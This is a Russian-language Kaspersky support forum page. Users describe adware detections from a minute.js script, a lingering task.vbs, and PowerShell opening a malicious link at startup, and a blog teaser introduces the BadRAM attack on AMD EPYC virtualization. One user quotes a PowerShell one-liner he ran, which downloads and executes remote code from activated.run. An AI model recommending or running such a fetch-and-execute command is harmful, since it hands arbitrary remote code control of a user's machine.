загрузка остановлена вредоносный объект "not-a-virus:heur:adware.script.generic"
-
Похожий контент
-
От Андрей Тимохин
Здравствуйте!
У меня на компьютере вирус. При переходе на некоторые сайты от антивирусника Kaspersky Free появляется сообщение
Событие: Мы нашли приложение, которое может быть использовано злоумышленниками для нанесения вреда компьютеру или вашим данным.
Пользователь: DESKTOP-HA516CQ\Андрей
Тип пользователя: Инициатор
Имя приложения: msedge.exe
Путь к приложению: C:\Program Files (x86)\Microsoft\Edge\Application
Компонент: Интернет-защита
Описание результата: Обнаружено
Тип: Содержит рекламное приложение, приложение автодозвона или легальное приложение, которое может быть использовано злоумышленниками для нанесения вреда компьютеру или данным пользователя
Название: not-a-virus:HEUR:AdWare.Script.Generic
Точность: Эвристический анализ
Степень угрозы: Средняя
Тип объекта: Файл
Имя объекта: minute.js?23402&v=3&u=null&a=0.9136341947792097
Путь к объекту: ссылка на сайт
MD5 объекта: DFCEA49E5A347438D5986D75836F0BA3
Причина: Экспертный анализ
Дата выпуска баз: Вчера, 19.12.2024 19:16:00
и почти сразу же появляется сообщение о приостановке загрузки вредоносного файла
Событие: Загрузка остановлена
Пользователь: DESKTOP-HA516CQ\Андрей
Тип пользователя: Инициатор
Имя приложения: msedge.exe
Путь к приложению: C:\Program Files (x86)\Microsoft\Edge\Application
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Содержит рекламное приложение, приложение автодозвона или легальное приложение, которое может быть использовано злоумышленниками для нанесения вреда компьютеру или данным пользователя
Название: not-a-virus:HEUR:AdWare.Script.Generic
Точность: Эвристический анализ
Степень угрозы: Средняя
Тип объекта: Файл
Имя объекта: minute.js?23402&v=3&u=null&a=0.9136341947792097
Путь к объекту: ссылка на сайт
MD5 объекта: DFCEA49E5A347438D5986D75836F0BA3
Причина: Экспертный анализ
Дата выпуска баз: Вчера, 19.12.2024 19:16:00 .
Такие сообщения появляются в браузере Edge. Пробовал устанавливать другие браузеры. Они также выводят такие же сообщения.
При проверке компьютера Kaspersky Virus Removal Tool обнаруживает, что некоторые файлы браузера повреждены.
Как избавиться от этого вируса?
-
От vlanzzy
CollectionLog-2024.12.19-19.35.zip
Произошло заражение вирусом, выполнял проверку через KVRT и смог удалить вирусы, но теперь запускается task.vbs
-
От Snake200221
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует
Также недавно активировал систему командой в сmd, а именно "powershell iex (irm 'activated.run/key')". Может быть это она спровоцировала данную проблему
CollectionLog-2025.01.04-00.02.zip
-
От mrTomny
Вопрос не решился? у меня такая же проблема вылезла....
инфо.txt
Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
-
От KL FC Bot
Исследователи из трех европейских университетов недавно продемонстрировали атаку BadRAM. Она стала возможна благодаря уязвимости в процессорах AMD EPYC и угрожает прежде всего поставщикам облачных решений и систем виртуализации. В наихудшем сценарии данная уязвимость может быть использована, чтобы скомпрометировать данные из максимально защищенной виртуальной машины.
Впрочем, реализовать этот сценарий на практике будет достаточно нелегко. Атака предполагает физический доступ к серверу, а затем — максимальный уровень доступа к программному обеспечению. Однако, прежде чем обсуждать атаку BadRAM в деталях, стоит поговорить о концепции Trusted Execution Environment, или TEE.
Особенности TEE
Ошибки в программном обеспечении неизбежны. По разным оценкам, сделанным еще в девяностые годы прошлого века, на каждую тысячу строк кода приходится от 1 до 20 ошибок. Часть этих ошибок приводит к уязвимостям, через которые злоумышленники могут попробовать добраться до конфиденциальной информации. Поэтому в случаях, когда защищенность каких-то данных или цепочки вычислений (например, обработки секретных ключей шифрования) должна быть максимальной, имеет смысл изолировать эти данные (или вычисления) от всего остального кода. Примерно в этом и состоит концепция Trusted Execution Environment.
Существует огромное количество реализаций TEE для решения различных задач. В процессорах AMD она реализована в виде технологии Secure Encrypted Virtualization, обеспечивающей повышенную защиту виртуальных машин. Она подразумевает шифрование данных виртуальной системы в памяти, чтобы системы других виртуальных машин или оператор физического сервера, на котором развернуты виртуальные ОС, не могли получить к ним доступ. Относительно недавно для этой технологии было выпущено расширение Secure Nested Paging, способное определить попытки несанкционированного доступа к данным виртуальной системы.
Представьте себе сценарий, когда финансовая организация использует инфраструктуру стороннего подрядчика для работы своих виртуальных систем. На виртуальных ОС обрабатываются максимально конфиденциальные данные, и нужно обеспечить их стопроцентную безопасность. Можно предъявлять повышенные требования к подрядчику, но в некоторых случаях проще исходить из того, что ему нельзя полностью доверять.
View the full article
-
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти